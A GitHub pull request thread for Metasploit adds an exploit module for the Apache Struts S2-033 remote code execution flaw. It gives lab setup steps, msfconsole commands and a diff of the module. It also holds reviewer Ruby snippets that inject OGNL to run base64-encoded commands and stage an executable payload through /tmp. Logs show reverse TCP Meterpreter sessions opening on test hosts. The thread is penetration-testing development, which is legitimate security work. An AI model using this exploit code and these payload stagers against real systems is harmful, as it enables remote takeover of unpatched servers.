### PR TITLE
add Apache struts S2-033 RCE

### PR DESCRIPTION
**Pull request by nixawk**
@wchen-r7  @wvu-r7 @bcook-r7 Please test the module. 

https://struts.apache.org/docs/s2-033.html
https://www.seebug.org/vuldb/ssvid-91741
## Environment Setup

Please setup tomcat [struts2-rest-showcase.war](https://github.com/rapid7/metasploit-framework/files/300762/struts2-rest-showcase.tar.gz)

Enable DMI mode - **/var/lib/tomcat8/webapps/struts2-rest-showcase/WEB-INF/classes/struts.xml**

```
   <constant name="struts.enable.DynamicMethodInvocation" value="true" />
    <constant name="struts.devMode" value="false" />
```
## Verification

List the steps needed to make sure this thing works
- [x] Start `msfconsole`
- [x] `use exploit/multi/http/struts_dmi_rest_exec`
- [x] `set RHOST 172.16.176.226`
- [x] `set TARGETURI /struts2-rest-showcase/orders/3`
- [x] `exploit`

Please view https://github.com/rapid7/metasploit-framework/issues/6944, and **linux** / **java** / **windows** stagers are here. 

```
msf exploit(struts_dmi_rest_exec) > show options

Module options (exploit/multi/http/struts_dmi_rest_exec):

   Name       Current Setting                  Required  Description
   ----       ---------------                  --------  -----------
   Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      172.16.176.226                   yes       The target address
   RPORT      8080                             yes       The target port
   SSL        false                            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /struts2-rest-showcase/orders/3  yes       The path to a struts application action
   TMPPATH                                     no        Overwrite the temp path for the file upload. Needed if the home directory is not writable.
   VHOST                                       no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   DebugOptions  0                no        Debugging options for POSIX meterpreter
   LHOST         172.16.176.1     yes       The listen address
   LPORT         4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Universal


msf exploit(struts_dmi_rest_exec) > check
[+] The target is vulnerable.
msf exploit(struts_dmi_rest_exec) > run

[*] Started reverse TCP handler on 172.16.176.1:4444
[*] 172.16.176.226:8080 - Uploading exploit to /tmp/8wN6, and executing it.
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 172.16.176.226
[*] Meterpreter session 2 opened (172.16.176.1:4444 -> 172.16.176.226:57188) at 2016-06-06 03:47:18 -0500

meterpreter > sysinfo
Computer     : lab
OS           : Linux lab 4.3.0-kali1-686-pae #1 SMP Debian 4.3.5-1kali1 (2016-02-11) (i686)
Architecture : i686
Meterpreter  : x86/linux
meterpreter >
```

### CODE REVIEW

File: modules/exploits/multi/http/struts_dmi_rest_exec.rb [hunk 1]
```diff
@@ -0,0 +1,204 @@
...
+    case target['Platform']
+      when 'java'
+        payload_exe = "#{temp_path}#{payload_exe}.jar"
+        pl_exe = payload.encoded_jar.pack
+        command = "java -jar #{payload_exe}"
+      when 'linux'
+        path = datastore['TMPPATH'] || '/tmp/'
+        pl_exe = generate_payload_exe
+        payload_exe = "#{path}#{payload_exe}"
+        command = "/bin/sh -c #{payload_exe}"
```
Comment (wvu-r7) [inline modules/exploits/multi/http/struts_dmi_rest_exec.rb]: Can you use ```CmdStager``` instead?

**Comment by Meatballs1** [comment]
Struts, the gift that keeps giving.

File: modules/exploits/multi/http/struts_dmi_rest_exec.rb (hunk 1 above)
Comment (join-us) [inline modules/exploits/multi/http/struts_dmi_rest_exec.rb]: @wvu-r7  `execute_command` has some limits, ex: `echo AAA | tee /tmp/test`. Any good idea for it ? 

```
  def execute_command(cmd, opts={})
    var_a = rand_text_alpha_lower(4)
    var_b = rand_text_alpha_lower(4)
    code =  "##{var_a}=new sun.misc.BASE64Decoder(),"
    code << "@java.lang.Runtime@getRuntime().exec(new java.lang.String(##{var_a}.decodeBuffer(#parameters.#{var_b}[0])))"
    payload = generate_rce_payload(code)

    params_hash = {
      var_b => Rex::Text.encode_base64(cmd)
    }
    send_http_request(payload, params_hash)
  end
```

```
  def linux_stager
    cmds = "echo LINE | tee FILE"
    exe  = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
    base64 = Rex::Text.encode_base64(exe)
    base64.gsub!(/\=/, "\\u003d")
    file = rand_text_alphanumeric(6+rand(4))

    execute_command("touch /tmp/#{file}.b64")
    cmds.gsub!(/FILE/, "/tmp/" + file + ".b64")

    base64.each_line do |line|
      line.chomp!
      cmd = cmds
      cmd.gsub!(/LINE/, line)
      execute_command(cmds)
    end

    execute_command("base64 -d /tmp/#{file}.b64|tee /tmp/#{file}")
    execute_command("chmod +x /tmp/#{file}")
    execute_command("rm /tmp/#{file}.b64")

    execute_command("/tmp/#{file}")
    @to_delete = "/tmp/#{file}"
  end
```

**Comment by wchen-r7** [comment]
I'll test the module tomorrow.

**Comment by wchen-r7** [comment]
Exploit works for me.

This is with the java payload:

```
msf exploit(struts_dmi_rest_exec) > run

[*] Started reverse TCP handler on 192.168.1.209:4444 
[*] 192.168.1.202:8080 - Uploading exploit to hDtS.jar, and executing it.
[*] Sending stage (46112 bytes) to 192.168.1.202
[*] Meterpreter session 1 opened (192.168.1.209:4444 -> 192.168.1.202:60910) at 2016-06-08 18:23:57 -0500

meterpreter >
```

This is with the linux payload:

```
msf exploit(struts_dmi_rest_exec) > run

[*] Started reverse TCP handler on 192.168.1.209:4444 
[*] 192.168.1.202:8080 - Uploading exploit to /tmp/wTTtGTJ, and executing it.
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 192.168.1.202
[*] Meterpreter session 2 opened (192.168.1.209:4444 -> 192.168.1.202:60911) at 2016-06-08 18:24:34 -0500

meterpreter > 
```

**Comment by join-us** [comment]
@wchen-r7 @wvu-r7  If a good idea, we can try to make it strong with **CmdStager** features.

**Comment by wchen-r7** [comment]
@join-us I'm seeing the same problem, and I'm not sure why. Tried to get more debugging info by running catalina.sh, but no luck.

So first off, this is my test code:

```ruby
  def upload_exec(cmd, filename, content)
    code =  "#decoder=new sun.misc.BASE64Decoder(),"
    code << "@java.lang.Runtime@getRuntime().exec(new java.lang.String(#decoder.decodeBuffer(#parameters.payload[0])))"
    payload = generate_rce_payload(code)

    params_hash = {
      'payload' => Rex::Text.encode_base64(cmd),
    }
    send_http_request(payload, params_hash)
  end
```

To play with this method, first try to generate a linux/x86/meterpreter/reverse_tcp, place it on the test machine's /tmp (let's call it /tmp/test). And then make you cmd string do this:

```ruby
cmd = '/bin/sh -c /tmp/test'
```

You will see that you get a shell. Ok, that just means that the Java code being injected works.

BUT, when you echo a file, like this:

```ruby
cmd = '/bin/sh -c "echo test > /tmp/message"'
```

or this:

```ruby
cmd = '/bin/sh -c "echo test > /tmp/message"'
```

You will not see that file being written to /tmp. It almost feels like ```>``` is a bad character... and I'm not sure why. If that is true, that makes the command stager not usable for this exploit, since that is an important thing the mixin relies on.

I also don't feel like using command stager gives us more advantage in this case, since both techniques (what the exploit is doing right now vs the cmd stager) are writing the payload to /tmp. I don't really think that should be a blocker. So I will go ahead and land the PR anyway, and then if you want we can continue investigating this problem.

**Comment by wvu-r7** [comment]
I'll take a look at the quirks in ```CmdStager``` tomorrow. This is right up my alley. I'm all for the manual method if it works better, though. Great work!

**Comment by join-us** [comment]
Thanks. `>` ,  `|`, `"`, `'` are bad chars here.

**Pull request merged**